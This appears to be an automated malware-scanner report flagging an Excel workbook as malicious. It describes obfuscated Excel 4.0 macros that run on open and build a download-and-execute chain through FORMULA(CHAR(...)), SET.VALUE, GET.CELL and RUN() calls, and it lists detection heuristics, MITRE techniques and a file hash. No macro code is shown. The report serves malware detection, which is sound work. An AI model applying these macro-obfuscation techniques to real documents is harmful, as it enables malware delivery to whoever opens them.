Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains obfuscated Excel 4.0 macros with an Auto_Open entry, indicating an attempt to automatically execute malicious code upon opening. The macro uses a chain of FORMULA(CHAR(...)) calls, which are likely deobfuscating and constructing a command to download and execute a second-stage payload. This is a common technique for delivering malware via spearphishing attachments.
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- Obfuscated XLM Auto_Open execution chain (critical, OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 128363 bytes |

SHA-256: 3e520cf0ded7de8b320d3869531b0ae013f92541d0cfb62936b35d621244d447
Preview script: first 1,000 lines of the extracted script